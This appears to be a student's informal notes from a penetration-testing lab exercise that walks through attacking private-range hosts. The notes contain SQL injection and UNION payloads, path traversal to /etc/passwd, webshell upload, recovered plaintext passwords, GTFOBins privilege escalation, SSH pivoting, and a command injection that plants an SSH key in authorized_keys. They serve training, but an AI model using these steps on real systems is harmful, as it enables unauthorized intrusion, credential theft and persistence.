10.50.29.85:8000

10.50.37.23
MAKE THE MASTER SOCKET ON YOUR LIN OPS SINCE THERE IS NO JUMP BOX
nmap <ip>
nmap --script http-enum.nse 10.50.37.23 -p 80
File to read: ../../../../../etc/passwd
view page source so its easier to read 
do like 3 or 4 or 5 (../)s
../../../../../etc/hosts
scan the network of the host found in /etc/hosts
ssh with creds found in /scripts
Upload image: upload webshell
You need to upload and get to directory 
Contact information: Not much use

admin profile
tom' or 1 = '1 pass and username
f12, go to network -> html -> request, copy the stuff found
link.#.#.#?<paste stuff found >
paste into schyber schef, rot13 or base64


Place second Master Socket onto Target and proxychains nmap 10.10.28.30
ssh -MS /tmp/two user2@10.50.37.23

on box:
/bin/bash
for i in {1..254}; do (ping -c 1 192.168.28.$i | grep "bytes from" &); done
cat /etc/hosts
did proxychains nmap, came up with ports 22 and port 80 open
then I made a tunnel to the 80 and went on the website.
Found it had lists, so i did 
?product = 7 UNION select 1,2,3;
it appeared 1 3 2
?product = 7 UNION select 1,3,2;
so that means in http://127.0.0.1:41804/pick.php?product=7 UNION select table_schema,column_name, table_name from information_schema.columns;#
it will go  table schema, table name, and column name in order
select 3 columns, from table_schema.table_name
http://127.0.0.1:41804/pick.php?product=7 UNION select table_schema,column_name, table_name from information_schema.columns;#
It didn't work on the first product, did prod 7
did the following
http://127.0.0.1:41804/pick.php?product=7 UNION select user_id, name, username from siteusers.users;#
and found passwords. Passwords are either going to be in ROT13 or Base64, converted they are

AARON: apasswordyPa$$word
user2:EaglesIsARE78
user3:Bob4THEEapples

yeah just ssh in

look at /etc/passwd
cat /etc/hosts
even do arp -a
find / -type f -perm (that command, its in student guide and go to GTFO bins)
even do sudo -l and see what you find
abuse it with GTFO BINS
exploit  the other box found on the first box, which you would find with ping sweeping the network, with nmap.
now make a tunnel to vulnerable rdp port , banner grab the ports nc ip port
once you hit that windows, use the msfvenom commands with multi handler
then use xfreerdp on it
xfreerdp /u:user p:/password /dynamic-resolution +clipboard /v:127.0.0.1:port made for rdp tunnel
 if you get error code, delete the contents of the file shown

once you get on look at 
services, scheduled tasks, and registry

find exe in services or task scheduler
tasklist /svc | find "(service)"

find the pid and coorelate the network connection with
netstat -ano | findstr "pid"
could banner grab it as well

even look at the windows defender

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
*******************************************************************PRACTICE*******************************************************************
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Cars we sell POST method
Ford' or 1 = '1
Honda' or 1 = '1
Dodge' or 1 = '1
Audi' or 1 = '1

audi gave results,

Audi' UNION select 1,2,3 #
keep adding until it spits out an output
Audi' Union select 1,2,3,4,5 # works, but it doesn't display 2. 2 is just filler so we can see what we want, so it will look a lot like this
Audi' UNION select table_schema,2,table_name,column_name,5 FROM information_schema.columns #

Exploit Development (The gdb stuff)
https://github.com/jacksonwilkie/Security/blob/main/Exploit%20Development

CMD Injection for your own password
ssh-keygen -t rsa -b 4096
cmd injection::::: mkdir /.ssh
;echo "(paste publickey)" > /var/www/.ssh/authorized_keys
;cat /var/www/.ssh/authorized_keys

one > will create a file, two >> will append to a file

ssh -i id_ ( idk look in student guide ezpz)

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
--------------------------------------------------------------RECAP---------------------------------------------------------------------------------------
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Every linux box: /etc/passwd, /etc/hosts, cat out user directories, /etc/crontabs, /tmp, find / perm command, look in any scripts found if possible
                                                                            
                                                                    port 22 open
          _---------------------------------------------------------->192.168.28.172
Lin OPS -/-> user2 /---------------------------->192.168.28.181 ----------------------------------------------------------->Windows ip
          nmap http-enum scan                    ports 80 and 22 open                                                          Made tunnel to RDP Port and then ran an xfreerdp on it
          cat /etc/hosts                         http-enum scan, scanning new network
          Master Socket made                     SQL 
          nmap found ports 22 and 80                
